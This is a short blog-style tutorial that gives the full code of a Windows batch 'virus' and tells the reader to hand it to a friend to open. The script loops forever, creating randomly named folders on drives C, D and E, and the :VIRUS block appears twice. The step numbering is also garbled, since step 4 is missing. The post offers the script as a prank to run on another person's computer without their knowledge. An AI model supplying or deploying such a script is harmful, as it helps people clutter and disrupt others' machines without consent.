Virus That Create Multiple Folders in All Drives
Today,We are Going to create a "Virus That create Multiple Folder in all Drives."
Prerequisite
1. A Computer.
2. Notepad.
Steps to Create Virus
1. Go to Start Menu.
2. Open Notepad.
3. Copy the Following Code Given Below.
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
__________________________________
5. Give this File to your Friend & tell him to Open The File. It will create Random Folder in all Drive.
No comments:
Post a Comment